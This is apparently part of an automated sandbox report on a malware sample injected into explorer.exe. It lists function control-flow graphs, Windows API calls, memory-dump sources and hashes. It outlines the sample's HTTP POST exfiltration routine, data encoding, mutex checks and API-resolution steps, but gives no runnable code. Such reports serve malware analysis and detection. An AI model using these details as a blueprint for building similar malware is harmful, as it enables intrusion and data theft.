116->119 120 839e14-839e23 117->120 121 839df4 117->121 118->117 119->116 124 839e5b-839e5e 119->124 122 839e25-839e2c 120->122 123 839e34-839e41 120->123 125 839df5-839df7 121->125 122->122 126 839e2e 122->126 123->123 127 839e43-839e45 123->127 124->116 128 839e60-839e7c 124->128 129 839e00-839e04 125->129 130 839df9-839dfe 125->130 126->94 127->94 128->119 132 839e7e 128->132 129->125 131 839e06 129->131 130->129 133 839e11 131->133 134 839e08-839e0f 131->134 135 839e84-839e88 132->135 133->120 134->125 134->133 136 839e8a-839ea0 135->136 137 839ecf-839ed2 135->137 143 839ea1-839ea6 136->143 138 839ed5-839edc 137->138 140 839f00-839f30 VirtualProtect * 2 138->140 141 839ede-839ee0 138->141 142 839f34-839f38 140->142 144 839ef3-839efe 141->144 145 839ee2-839ef1 141->145 142->142 146 839f3a 142->146 143->135 147 839ea8-839eaa 143->147 144->145 145->138 146->107 148 839eb3-839ec0 147->148 149 839eac-839eb2 147->149 151 839ec2-839ec7 148->151 152 839ec9-839ecc 148->152 149->148 151->143
                        Memory Dump Source
                        • Source File: 00000008.00000002.1955587460.0000000000838000.00000040.80000000.00040000.00000000.sdmp, Offset: 00838000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_838000_explorer.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5331aa2ca988823c02e1fcba19f9ecdb7256819dccc042b70424aabed4244430
                        • Instruction ID: 15ebe856fb7e0a3767806e04aace779e67b0c710a9650f5a807ace1f3923d730
                        • Opcode Fuzzy Hash: 5331aa2ca988823c02e1fcba19f9ecdb7256819dccc042b70424aabed4244430
                        • Instruction Fuzzy Hash: 859139725593914FD7169E78CCC16B5BBA0FB92324F2C06A9C8D1CB386E7E4580AC7E0
                        Function 008329B7 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 162 8329b7-8329c7 GetProcessHeap RtlAllocateHeap
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000412,0083257A,008318F4), ref: 008329BA
                        • RtlAllocateHeap.NTDLL(00000000), ref: 008329C1
                        Memory Dump Source
                        • Source File: 00000008.00000002.1955587460.0000000000831000.00000040.80000000.00040000.00000000.sdmp, Offset: 00831000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_831000_explorer.jbxd
                        Similarity
                        • API ID: Heap$AllocateProcess
                        • String ID:
                        • API String ID: 1357844191-0
                        • Opcode ID: b4a4eba07ad0d7409ac47feca2a9276de02681874ed0f9b4b82248323cf478b9
                        • Instruction ID: fa13855166405c0a6e647848cc380f42d6f5f21eba92606c4091c66b38f8b44b
                        • Opcode Fuzzy Hash: b4a4eba07ad0d7409ac47feca2a9276de02681874ed0f9b4b82248323cf478b9
                        • Instruction Fuzzy Hash: 64A002B15506005BDD4867B5AE1DA157528F7D4701F004944734585054996456448721

                        Non-executed Functions

                        Function 008320A7 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 170 8320a7-832102 call 832415 call 8329b7 call 832938 call 8324cc 179 832104-83211b 170->179 180 83211d-832129 170->180 183 83212d-83212f 179->183 180->183 184 832403-832412 call 832999 183->184 185 832135-83216c RtlZeroMemory 183->185 189 832172-83218d 185->189 190 8323fb-832402 185->190 191 8321bf-8321d1 189->191 192 83218f-8321a0 call 83243d 189->192 190->184 197 8321d5-8321d7 191->197 198 8321b3 192->198 199 8321a2-8321b1 192->199 200 8323e8-8323ee 197->200 201 8321dd-832239 call 832866 197->201 202 8321b5-8321bd 198->202 199->202 205 8323f0-8323f2 call 832999 200->205 206 8323f7 200->206 210 8323e1 201->210 211 83223f-832244 201->211 202->197 205->206 206->190 210->200 212 832246-832257 211->212 213 83225e-83228c call 8329b7 wsprintfW 211->213 212->213 216 8322a5-8322bc 213->216 217 83228e-832290 213->217 222 8322fb-832315 216->222 223 8322be-8322f4 call 8329b7 wsprintfW 216->223 218 832291-832294 217->218 220 832296-83229b 218->220 221 83229f-8322a1 218->221 220->218 224 83229d 220->224 221->216 228 83231b-83232e 222->228 229 8323be-8323d4 call 832999 222->229 223->222 224->216 228->229 233 832334-83234a call 8329b7 228->233 237 8323d6-8323d8 call 832999 229->237 238 8323dd 229->238 239 83234c-832357 233->239 237->238 238->210 241 83236b-832382 239->241 242 832359-832366 call 83297c 239->242 246 832386-832393 241->246 247 832384 241->247 242->241 246->239 248 832395-832399 246->248 247->246 249 8323b3-8323ba call 832999 248->249 250 83239b 248->250 249->229 251 83239b call 83296b 250->251 254 8323a0-8323ad RtlMoveMemory 251->254 254->249
                        APIs
                          • Part of subcall function 008329B7: GetProcessHeap.KERNEL32(00000008,00000412,0083257A,008318F4), ref: 008329BA
                          • Part of subcall function 008329B7: RtlAllocateHeap.NTDLL(00000000), ref: 008329C1
                          • Part of subcall function 00832938: lstrlen.KERNEL32(02F5F4BE,?,00000000,00000000,008320E3,74DE8A60,02F5F4BE,00000000), ref: 00832940
                          • Part of subcall function 00832938: MultiByteToWideChar.KERNEL32(00000000,00000000,02F5F4BE,00000001,00000000,00000000), ref: 00832952
                          • Part of subcall function 008324CC: RtlZeroMemory.NTDLL(?,00000018), ref: 008324DE
                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 0083213F
                        • wsprintfW.USER32 ref: 00832278
                        • wsprintfW.USER32 ref: 008322E3
                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 008323AD
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.1955587460.0000000000831000.00000040.80000000.00040000.00000000.sdmp, Offset: 00831000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_831000_explorer.jbxd
                        Similarity
                        • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                        • API String ID: 4204651544-1701262698
                        • Opcode ID: 73255195b98b2ea16b3dfefc1791641c1ca1fb4f20ded3fd1528a39123211da5
                        • Instruction ID: 8c93eb40aaa1033cea68178a5ad566031334b206b1cc0174ed934ef5f573f654
                        • Opcode Fuzzy Hash: 73255195b98b2ea16b3dfefc1791641c1ca1fb4f20ded3fd1528a39123211da5
                        • Instruction Fuzzy Hash: 9EA16871608744AFD714AF68DC84A2FBBE8FBC8344F00092DF986D7361DA74DA048B92
                        Function 00831ECE Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 255 831ece-831eec StrStrIA 256 831ef5-831f35 RtlMoveMemory * 2 StrStrIA 255->256 257 831eee-831ef0 255->257 259 831fa7 256->259 260 831f37-831f48 StrStrIA 256->260 258 831fab-831fb3 257->258 262 831fa9-831faa 259->262 260->259 261 831f4a-831f5b StrStrIA 260->261 261->259 263 831f5d-831f68 lstrlen 261->263 262->258 264 831fa3-831fa5 263->264 265 831f6a 263->265 264->262 266 831f6c-831f78 call 831ffb 265->266 269 831f9b-831fa1 lstrlen 266->269 270 831f7a-831f80 266->270 269->264 269->266 271 831f82-831f85 270->271 272 831f87-831f8a 270->272 271->269 271->272 272->269 273 831f8c-831f8f 272->273 273->269 274 831f91-831f94 273->274 274->269 275 831f96-831f99 274->275 275->259 275->269
                        APIs
                        • StrStrIA.SHLWAPI(?,008331D8,00000000,02F771C8), ref: 00831EE4
                        • RtlMoveMemory.NTDLL(?,?,00000000), ref: 00831F08
                        • RtlMoveMemory.NTDLL(?,?,00000100), ref: 00831F22
                        • StrStrIA.SHLWAPI(00000000,?,?,00000000), ref: 00831F31
                        • StrStrIA.SHLWAPI(00000000,?,?,00000000), ref: 00831F44
                        • StrStrIA.SHLWAPI(?,?,?,00000000), ref: 00831F57
                        • lstrlen.KERNEL32(?,?,00000000), ref: 00831F64
                        • lstrlen.KERNEL32(?,?,?,00000000), ref: 00831F9D
                        Memory Dump Source
                        • Source File: 00000008.00000002.1955587460.0000000000831000.00000040.80000000.00040000.00000000.sdmp, Offset: 00831000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_831000_explorer.jbxd
                        Similarity
                        • API ID: MemoryMovelstrlen
                        • String ID:
                        • API String ID: 456560858-0
                        • Opcode ID: 85d9943f712702c75fa8092785ef3eef5ed49a5132ae7ec9be953720f3160a8d
                        • Instruction ID: 86bf7ba064b1c72d422905ce18c1a0790e5e2700f713145e880036dcf7a3fe5f
                        • Opcode Fuzzy Hash: 85d9943f712702c75fa8092785ef3eef5ed49a5132ae7ec9be953720f3160a8d
                        • Instruction Fuzzy Hash: 662183725043096ADF30AA649C89EEB77DCFBD5B44F010926F940D3111EF29D94A8AE2
                        Function 00831E44 Relevance: 7.6, APIs: 5, Instructions: 81stringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 291 831e44-831e59 292 831e5b-831e73 lstrlen CharLowerBuffA 291->292 293 831ec8-831ecd 291->293 294 831e75-831e7b 292->294 295 831e9d-831eaa call 8326fc 292->295 296 832671-83267d 293->296 297 831e7f-831e89 lstrcmpiA 294->297 301 831ec7 295->301 306 831eac-831eb5 call 831ece 295->306 299 8326a9-8326ab 296->299 300 83267f-832688 296->300 297->301 302 831e8b-831e9b 297->302 304 832692-8326a8 lstrlen RtlMoveMemory 300->304 305 83268a-832690 300->305 301->293 302->295 302->297 304->299 305->304 306->301 309 831eb7-831ec2 306->309 309->296
                        APIs
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,00831BF4), ref: 00831E5D
                        • CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?,?,00831BF4), ref: 00831E69
                        • lstrcmpiA.KERNEL32(?,02F7816C), ref: 00831E81
                        • lstrlen.KERNEL32(?,00000000), ref: 00832699
                        • RtlMoveMemory.NTDLL(02F7816C,?,00000000), ref: 008326A2
                        Memory Dump Source
                        • Source File: 00000008.00000002.1955587460.0000000000831000.00000040.80000000.00040000.00000000.sdmp, Offset: 00831000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_831000_explorer.jbxd
                        Similarity
                        • API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
                        • String ID:
                        • API String ID: 2826435453-0
                        • Opcode ID: 28ac383cb299b69ec5c5675acbb156e0bcad83480244d2cb67e814b5c87bef33
                        • Instruction ID: c793d2dd282d4f2df4eb2198cf5e8d73c4c339f7bf22776747475bf4cf4a4fe8
                        • Opcode Fuzzy Hash: 28ac383cb299b69ec5c5675acbb156e0bcad83480244d2cb67e814b5c87bef33
                        • Instruction Fuzzy Hash: 2C21F6B26006105FDB109F68EC889BA779DFFC9711F10042AEC05C7241D772990687E2
                        Function 00831E3E Relevance: 7.6, APIs: 5, Instructions: 76stringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 310 831e3e-831e59 311 831e5b-831e73 lstrlen CharLowerBuffA 310->311 312 831ec8-831ecd 310->312 313 831e75-831e7b 311->313 314 831e9d-831eaa call 8326fc 311->314 315 832671-83267d 312->315 316 831e7f-831e89 lstrcmpiA 313->316 320 831ec7 314->320 325 831eac-831eb5 call 831ece 314->325 318 8326a9-8326ab 315->318 319 83267f-832688 315->319 316->320 321 831e8b-831e9b 316->321 323 832692-8326a8 lstrlen RtlMoveMemory 319->323 324 83268a-832690 319->324 320->312 321->314 321->316 323->318 324->323 325->320 328 831eb7-831ec2 325->328 328->315
                        APIs
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,00831BF4), ref: 00831E5D
                        • CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?,?,00831BF4), ref: 00831E69
                        • lstrcmpiA.KERNEL32(?,02F7816C), ref: 00831E81
                        • lstrlen.KERNEL32(?,00000000), ref: 00832699
                        • RtlMoveMemory.NTDLL(02F7816C,?,00000000), ref: 008326A2
                        Memory Dump Source
                        • Source File: 00000008.00000002.1955587460.0000000000831000.00000040.80000000.00040000.00000000.sdmp, Offset: 00831000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_831000_explorer.jbxd
                        Similarity
                        • API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
                        • String ID:
                        • API String ID: 2826435453-0
                        • Opcode ID: 17c5b9e922fd7f286888d082a4673bd4c0f9ea1ade115ad6b49d7d80ec031081
                        • Instruction ID: 67724ec3961c81c6b1c42743550204609e9de753a91f281b355fe2257a3d6541
                        • Opcode Fuzzy Hash: 17c5b9e922fd7f286888d082a4673bd4c0f9ea1ade115ad6b49d7d80ec031081
                        • Instruction Fuzzy Hash: F221F3B2A00610AFDB10DF68EC889AA77EDFFCA710F000869EC45D7241D772990687E2
                        Function 008318F4 Relevance: 6.1, APIs: 4, Instructions: 51fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 329 8318f4-831917 CreateFileW 330 831919-831927 GetFileSize 329->330 331 83196d-83196f 329->331 332 831965-83196c CloseHandle 330->332 333 831929-83192b 330->333 332->331 333->332 334 83192d-831949 call 8329b7 ReadFile 333->334 337 83194b-831958 call 831c39 call 831972 334->337 338 83195d-831964 call 832999 334->338 337->338 338->332
                        APIs
                        • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0083190C
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0083191C
                        • CloseHandle.KERNEL32(00000000), ref: 00831966
                          • Part of subcall function 008329B7: GetProcessHeap.KERNEL32(00000008,00000412,0083257A,008318F4), ref: 008329BA
                          • Part of subcall function 008329B7: RtlAllocateHeap.NTDLL(00000000), ref: 008329C1
                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00831941
                        Memory Dump Source
                        • Source File: 00000008.00000002.1955587460.0000000000831000.00000040.80000000.00040000.00000000.sdmp, Offset: 00831000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_831000_explorer.jbxd
                        Similarity
                        • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                        • String ID:
                        • API String ID: 2517252058-0
                        • Opcode ID: 95c450d297543539e2fdb251745f64bffe2e19ddd61c9b29b87c6c8b6490f919
                        • Instruction ID: f38331dcfc257c43e461972cfd22c21d6a4f1924d4514b617e387de7c23f12b2
                        • Opcode Fuzzy Hash: 95c450d297543539e2fdb251745f64bffe2e19ddd61c9b29b87c6c8b6490f919
                        • Instruction Fuzzy Hash: 5E01F73230021467D6212A299CACF6F7D5DFBC6BB0F000A29F956E21D0DA245D0541B0

                        Execution Graph

                        Execution Coverage:14.1%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:224
                        Total number of Limit Nodes:16
                        execution_graph 1514 382c18 1515 382c2a 1514->1515 1516 382c82 1515->1516 1525 382bf2 1515->1525 1518 382c45 1518->1516 1519 381141 2 API calls 1518->1519 1520 382c59 1519->1520 1521 382c79 1520->1521 1522 382c5d lstrlen 1520->1522 1544 38105d VirtualFree 1521->1544 1530 382678 1522->1530 1545 38224c 1525->1545 1529 382c09 1529->1518 1531 382691 1530->1531 1536 382721 1530->1536 1532 381274 VirtualQuery 1531->1532 1531->1536 1533 3826a7 1532->1533 1534 382753 1533->1534 1535 38279e 1533->1535 1533->1536 1538 3826e9 1533->1538 1558 381000 GetProcessHeap RtlAllocateHeap 1534->1558 1539 3827ad 1535->1539 1559 381000 GetProcessHeap RtlAllocateHeap 1535->1559 1536->1521 1542 382700 memcpy 1538->1542 1543 3827c7 memcpy 1539->1543 1540 382768 memcpy 1540->1536 1542->1536 1543->1536 1544->1516 1556 381000 GetProcessHeap RtlAllocateHeap 1545->1556 1547 382254 1548 3823e3 1547->1548 1557 38104c VirtualAlloc 1548->1557 1550 382633 1550->1529 1551 3825b5 lstrcat lstrcat lstrcat lstrcat 1553 3823fc 1551->1553 1552 381011 GetProcessHeap RtlFreeHeap VirtualQuery 1552->1553 1553->1550 1553->1551 1553->1552 1554 382346 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap VirtualQuery 1553->1554 1555 38231f GetProcessHeap RtlAllocateHeap memcpy 1553->1555 1554->1553 1555->1553 1556->1547 1557->1553 1558->1540 1559->1543 1334 3833b9 1335 3833fa 1334->1335 1336 3833c2 1334->1336 1344 381274 VirtualQuery 1336->1344 1339 3833ce RtlEnterCriticalSection 1346 383132 1339->1346 1345 38128b 1344->1345 1345->1335 1345->1339 1347 38314d 1346->1347 1360 3832e8 1346->1360 1347->1360 1370 381000 GetProcessHeap RtlAllocateHeap 1347->1370 1349 3831cd 1371 381000 GetProcessHeap RtlAllocateHeap 1349->1371 1351 383212 1352 3832d8 1351->1352 1353 38322c lstrlen 1351->1353 1354 381011 3 API calls 1352->1354 1353->1352 1355 38323d 1353->1355 1356 3832df 1354->1356 1372 381141 lstrlen lstrlen 1355->1372 1358 381011 3 API calls 1356->1358 1358->1360 1367 382f1f 1360->1367 1362 383260 1375 381000 GetProcessHeap RtlAllocateHeap 1362->1375 1364 38327f wsprintfA lstrcat 1376 381011 1364->1376 1366 3832b8 lstrcat lstrlen RtlMoveMemory 1366->1352 1368 382f3c RtlLeaveCriticalSection 1367->1368 1369 382f23 CreateThread CloseHandle 1367->1369 1368->1335 1369->1368 1381 382ed2 1369->1381 1370->1349 1371->1351 1373 381162 1372->1373 1373->1352 1374 381000 GetProcessHeap RtlAllocateHeap 1373->1374 1374->1362 1375->1364 1377 381274 VirtualQuery 1376->1377 1378 381019 1377->1378 1379 38102d 1378->1379 1380 38101d GetProcessHeap RtlFreeHeap 1378->1380 1379->1366 1380->1379 1382 382edd 1381->1382 1383 382f16 RtlExitUserThread 1381->1383 1393 38178c lstrlen 1382->1393 1386 382f0e 1388 381011 3 API calls 1386->1388 1388->1383 1391 382f07 1392 381011 3 API calls 1391->1392 1392->1386 1394 3817d3 1393->1394 1395 3817a4 CryptBinaryToStringA 1393->1395 1394->1386 1399 381b1b 1394->1399 1395->1394 1396 3817b7 1395->1396 1411 381000 GetProcessHeap RtlAllocateHeap 1396->1411 1398 3817c2 CryptBinaryToStringA 1398->1394 1400 381b3e 1399->1400 1401 381b31 lstrlen 1399->1401 1412 381000 GetProcessHeap RtlAllocateHeap 1400->1412 1401->1400 1403 381b46 lstrcat 1404 381b7b lstrcat 1403->1404 1405 381b82 1403->1405 1404->1405 1413 38186c 1405->1413 1408 381011 3 API calls 1409 381ba5 1408->1409 1410 38105d VirtualFree 1409->1410 1410->1391 1411->1398 1412->1403 1436 381000 GetProcessHeap RtlAllocateHeap 1413->1436 1415 381890 1437 38106c lstrlen MultiByteToWideChar 1415->1437 1417 38189f 1438 3817dc RtlZeroMemory 1417->1438 1420 3818f1 RtlZeroMemory 1423 381926 1420->1423 1421 381011 3 API calls 1422 381b10 1421->1422 1422->1408 1424 381af3 1423->1424 1440 381000 GetProcessHeap RtlAllocateHeap 1423->1440 1424->1421 1426 3819e2 wsprintfW 1427 381a02 1426->1427 1428 381add 1427->1428 1441 381000 GetProcessHeap RtlAllocateHeap 1427->1441 1429 381011 3 API calls 1428->1429 1429->1424 1431 381a70 1432 381ad6 1431->1432 1442 38104c VirtualAlloc 1431->1442 1433 381011 3 API calls 1432->1433 1433->1428 1435 381ac6 RtlMoveMemory 1435->1432 1436->1415 1437->1417 1439 3817fe 1438->1439 1439->1420 1439->1424 1440->1426 1441->1431 1442->1435 1560 383449 RtlEnterCriticalSection 1561 38346e 1560->1561 1585 3834ce 1560->1585 1562 3835bc RtlLeaveCriticalSection 1561->1562 1565 381274 VirtualQuery 1561->1565 1561->1585 1563 381274 VirtualQuery 1564 3834e9 1563->1564 1564->1562 1567 3834fd RtlZeroMemory 1564->1567 1568 3835b1 1564->1568 1566 383485 1565->1566 1570 381274 VirtualQuery 1566->1570 1566->1585 1569 382f3d 3 API calls 1567->1569 1568->1562 1571 38351c 1569->1571 1572 383494 1570->1572 1571->1562 1573 383526 StrToIntA 1571->1573 1574 383498 lstrcat 1572->1574 1572->1585 1573->1562 1575 38353b 1573->1575 1576 382faa 16 API calls 1574->1576 1577 381141 2 API calls 1575->1577 1578 3834bc 1576->1578 1579 383549 1577->1579 1580 382f1f 22 API calls 1578->1580 1579->1562 1582 383558 1579->1582 1583 383595 1579->1583 1581 3834c3 1580->1581 1593 38105d VirtualFree 1581->1593 1587 383574 1582->1587 1594 38105d VirtualFree 1582->1594 1586 382faa 16 API calls 1583->1586 1585->1562 1585->1563 1590 3835aa 1586->1590 1595 38104c VirtualAlloc 1587->1595 1592 382f1f 22 API calls 1590->1592 1591 383585 RtlMoveMemory 1591->1562 1592->1568 1593->1585 1594->1587 1595->1591 1596 382c8a 1597 382bf2 11 API calls 1596->1597 1598 382c9b 1597->1598 1599 382ca1 lstrlen 1598->1599 1600 382cc6 1598->1600 1601 382678 6 API calls 1599->1601 1602 382cbd 1601->1602 1604 38105d VirtualFree 1602->1604 1604->1600 1605 382cce 1606 382cd7 1605->1606 1607 382d02 1606->1607 1608 382678 6 API calls 1606->1608 1608->1607 1443 383371 1444 38337a 1443->1444 1445 3833b2 1443->1445 1446 381274 VirtualQuery 1444->1446 1447 383382 1446->1447 1447->1445 1448 383386 RtlEnterCriticalSection 1447->1448 1449 383132 13 API calls 1448->1449 1450 3833a3 1449->1450 1451 382f1f 22 API calls 1450->1451 1452 3833aa RtlLeaveCriticalSection 1451->1452 1452->1445 1453 3832f4 1454 383302 1453->1454 1455 38335f 1454->1455 1456 38332b RtlEnterCriticalSection 1454->1456 1457 38334e 1456->1457 1458 383342 1456->1458 1461 383357 RtlLeaveCriticalSection 1457->1461 1463 382faa 1458->1463 1461->1455 1462 382f1f 22 API calls 1462->1457 1464 381141 2 API calls 1463->1464 1465 382fbf 1464->1465 1466 382fd1 1465->1466 1467 381141 2 API calls 1465->1467 1482 383129 1466->1482 1498 381000 GetProcessHeap RtlAllocateHeap 1466->1498 1467->1466 1469 382fe6 1499 381000 GetProcessHeap RtlAllocateHeap 1469->1499 1471 382ff1 RtlZeroMemory 1500 382f3d 1471->1500 1474 38301e StrToIntA 1475 383118 1474->1475 1476 383038 1474->1476 1477 381011 3 API calls 1475->1477 1479 382f3d 3 API calls 1476->1479 1478 383120 1477->1478 1480 381011 3 API calls 1478->1480 1481 383047 1479->1481 1480->1482 1481->1475 1483 383051 lstrlen 1481->1483 1482->1462 1484 382f3d 3 API calls 1483->1484 1485 383066 1484->1485 1486 381141 2 API calls 1485->1486 1487 383074 1486->1487 1487->1475 1512 381000 GetProcessHeap RtlAllocateHeap 1487->1512 1489 38308b 1490 382f3d 3 API calls 1489->1490 1491 3830a4 wsprintfA 1490->1491 1513 381000 GetProcessHeap RtlAllocateHeap 1491->1513 1493 3830cc 1494 382f3d 3 API calls 1493->1494 1495 3830dd lstrcat 1494->1495 1496 381011 3 API calls 1495->1496 1497 3830ee lstrcat lstrlen RtlMoveMemory 1496->1497 1497->1475 1498->1469 1499->1471 1501 382f4b 1500->1501 1502 382f61 1500->1502 1503 381141 2 API calls 1501->1503 1504 381141 2 API calls 1502->1504 1509 382f57 1503->1509 1505 382f66 1504->1505 1506 382fa4 1505->1506 1507 381141 2 API calls 1505->1507 1506->1474 1506->1475 1507->1509 1508 381141 2 API calls 1510 382f8e 1508->1510 1509->1506 1509->1508 1510->1506 1511 382f92 RtlMoveMemory 1510->1511 1511->1506 1512->1489 1513->1493

                        Callgraph

                        • Executed
                        • Not Executed
                        • Opacity -> Relevance
                        • Disassembly available
                        callgraph 0 Function_00382F3D 49 Function_00381141 0->49 1 Function_0038133F 2 Function_00383132 15 Function_00381011 2->15 19 Function_00381000 2->19 2->49 3 Function_00381235 4 Function_00385137 5 Function_00388A37 6 Function_00389337 7 Function_00383829 18 Function_00383709 7->18 62 Function_003836A1 7->62 94 Function_003835D4 7->94 8 Function_00381320 9 Function_00389321 10 Function_00382C18 23 Function_00382678 10->23 39 Function_0038105D 10->39 10->49 81 Function_00382BF2 10->81 11 Function_00381B1B 11->15 11->19 30 Function_0038186C 11->30 12 Function_00382E1B 12->15 12->19 13 Function_00382F1F 92 Function_00382ED2 13->92 14 Function_0038231F 14->19 26 Function_00381274 15->26 16 Function_00389814 17 Function_00381C08 44 Function_0038104C 17->44 60 Function_00381BAF 17->60 78 Function_00381C82 17->78 93 Function_00381BD2 17->93 18->15 18->19 35 Function_00381363 18->35 54 Function_003815BE 18->54 20 Function_00383401 20->2 20->13 20->26 21 Function_00388702 22 Function_00381305 23->19 23->26 24 Function_00383371 24->2 24->13 24->26 25 Function_00388A71 27 Function_00382974 27->15 27->19 37 Function_00381765 27->37 27->39 40 Function_0038285F 27->40 27->44 27->49 59 Function_003828AD 27->59 28 Function_0038966A 29 Function_0038106C 30->15 30->19 30->29 30->44 69 Function_00381090 30->69 91 Function_003817DC 30->91 31 Function_0038926D 32 Function_00382B6E 32->11 32->15 32->27 32->32 32->39 74 Function_0038178C 32->74 89 Function_003827E7 32->89 33 Function_00381261 34 Function_00383862 34->3 34->7 34->8 34->15 34->17 34->19 34->22 34->26 34->33 34->49 55 Function_00382EA8 34->55 57 Function_003812AA 34->57 66 Function_00382D9A 34->66 34->69 76 Function_0038118D 34->76 87 Function_00381FE5 34->87 100 Function_003816C7 34->100 35->1 36 Function_00389763 38 Function_00382659 40->49 41 Function_00389955 42 Function_00383449 42->0 42->13 42->26 42->39 42->44 42->49 58 Function_00382FAA 42->58 43 Function_0038104A 45 Function_00381E4C 46 Function_0038224C 46->19 47 Function_00381F4E 48 Function_00383840 50 Function_00382643 51 Function_00389844 52 Function_00382346 52->15 52->19 72 Function_00382296 52->72 53 Function_003833B9 53->2 53->13 53->26 54->15 54->19 54->54 56 Function_003815A9 54->56 55->12 58->0 58->15 58->19 58->49 59->49 61 Function_003850A0 62->15 62->19 62->35 90 Function_003814D8 62->90 63 Function_003823A2 64 Function_00381CA5 86 Function_00381CE5 64->86 65 Function_00385198 67 Function_0038929C 68 Function_00388A9F 70 Function_00388F93 71 Function_00382295 73 Function_00382C8A 73->23 73->39 73->81 74->19 75 Function_00383D8D 75->19 75->26 75->34 75->75 84 Function_00383BE1 75->84 77 Function_00388B81 78->86 79 Function_003889F9 80 Function_003813FE 80->15 80->19 80->90 96 Function_003813D7 80->96 81->46 85 Function_003823E3 81->85 82 Function_003832F4 82->13 82->58 83 Function_00388EEF 84->3 84->7 84->8 84->19 84->22 84->26 84->33 84->49 84->55 84->57 84->69 84->87 85->14 85->15 85->44 85->52 85->63 87->26 87->45 87->47 88 Function_003895E5 89->15 89->26 90->15 90->19 90->80 90->96 92->11 92->15 92->39 92->74 93->64 94->15 94->19 94->35 94->90 95 Function_003893D4 97 Function_00382CCE 97->23 98 Function_003887CE 99 Function_00388CC3

                        Executed Functions

                        Function 00383862 Relevance: 142.1, APIs: 54, Strings: 27, Instructions: 334libraryloaderstringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 383862-3838de call 381000 GetModuleFileNameA call 381000 GetCurrentProcessId wsprintfA call 38118d CreateMutexA GetLastError 7 3838e4-383940 RtlInitializeCriticalSection PathFindFileNameA lstrcat call 381000 Sleep lstrcmpiA 0->7 8 383bc5-383c3a call 381011 * 2 RtlExitUserThread call 381000 * 2 wsprintfA call 381235 0->8 13 383a0a-383a14 lstrcmpiA 7->13 14 383946-383961 GetCommandLineW CommandLineToArgvW 7->14 69 383c3c-383c4c call 381141 8->69 70 383c5e 8->70 19 383a1a-383a24 lstrcmpiA 13->19 20 383b14-383b39 call 3816c7 GetModuleHandleA GetProcAddress 13->20 16 383bc3-383bc4 14->16 17 383967-38398b call 3816c7 GetModuleHandleA GetProcAddress 14->17 16->8 33 38398d-383999 call 381c08 17->33 34 38399e-3839c0 GetModuleHandleA GetProcAddress 17->34 19->20 24 383a2a-383a40 lstrcmpiA 19->24 35 383b3b-383b47 call 381c08 20->35 36 383b4c-383b59 GetModuleHandleA GetProcAddress 20->36 28 383a42-383a4e GetCommandLineA StrStrIA 24->28 29 383a67-383a71 lstrcmpiA 24->29 28->29 30 383a50 28->30 31 383a88-383a92 lstrcmpiA 29->31 32 383a73-383a7f GetCommandLineA StrStrIA 29->32 38 383a55-383a65 GetModuleHandleA 30->38 31->16 40 383a98-383aa4 GetCommandLineA StrStrIA 31->40 32->31 39 383a81-383a86 32->39 33->34 42 3839c2-3839d0 GetModuleHandleA GetProcAddress 34->42 43 3839d6-3839e8 GetModuleHandleA GetProcAddress 34->43 35->36 45 383b5b-383b67 call 381c08 36->45 46 383b6c-383b79 GetModuleHandleA GetProcAddress 36->46 51 383ace-383ad2 38->51 39->38 40->16 52 383aaa-383ac5 GetModuleHandleA 40->52 42->43 53 383b08-383b0f call 3816c7 42->53 54 3839f9-383a05 43->54 55 3839ea-3839f3 GetModuleHandleA GetProcAddress 43->55 45->46 49 383b7b-383b87 call 381c08 46->49 50 383b8c-383bbe call 3816c7 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 46->50 49->50 50->16 51->16 61 383ad8-383aea call 3816c7 call 382d9a 51->61 52->61 62 383ac7-383acc GetModuleHandleA 52->62 53->16 63 383b03 call 381c08 54->63 55->53 55->54 61->53 82 383aec-383af5 call 381274 61->82 62->51 63->53 79 383c4e call 383829 69->79 80 383c53-383c59 call 381261 69->80 73 383c64-383c74 